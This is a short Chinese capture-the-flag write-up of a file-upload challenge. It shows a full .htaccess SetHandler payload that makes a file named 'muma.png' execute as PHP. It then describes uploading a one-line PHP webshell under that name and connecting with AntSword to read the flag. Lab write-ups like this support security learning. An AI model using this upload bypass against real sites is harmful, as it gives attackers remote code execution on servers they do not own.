和test5一样,文件上传限制为图片,使用.htaccess文件让上传成功图片木马文件进行执行
开屏暴击,差点去世
尝试上传文件
各种过滤,但是能传图片,这里就不写了,我做过的test5遇到过的重复内容
直接尝试在test5中的方式
通过burp重放改content-type:image/png,上传.htaccess文件,内容如下
<FilesMatch "muma.png">
SetHandler application/x-httpd-php
</FilesMatch>
意思是遇到同目录下名为“muma.png”的文件当作php代码执行
成功,返回如下信息:
Warning: mkdir(): File exists in /var/www/html/upload.php on line 23
/var/www/html/upload/fc7623e1ca9592589f5a77755dabba1e/.htaccess succesfully uploaded!
然后上传“muma.png“的一句话木马
成功,返回如下信息:
Warning: mkdir(): File exists in /var/www/html/upload.php on line 23
/var/www/html/upload/fc7623e1ca9592589f5a77755dabba1e/muma.png succesfully uploaded!
接下来就直接蚁剑连接,先查看文件目录
直接在根目录里
找到flag{977a989e-05ea-4090-bd68-d1f0d66172e4}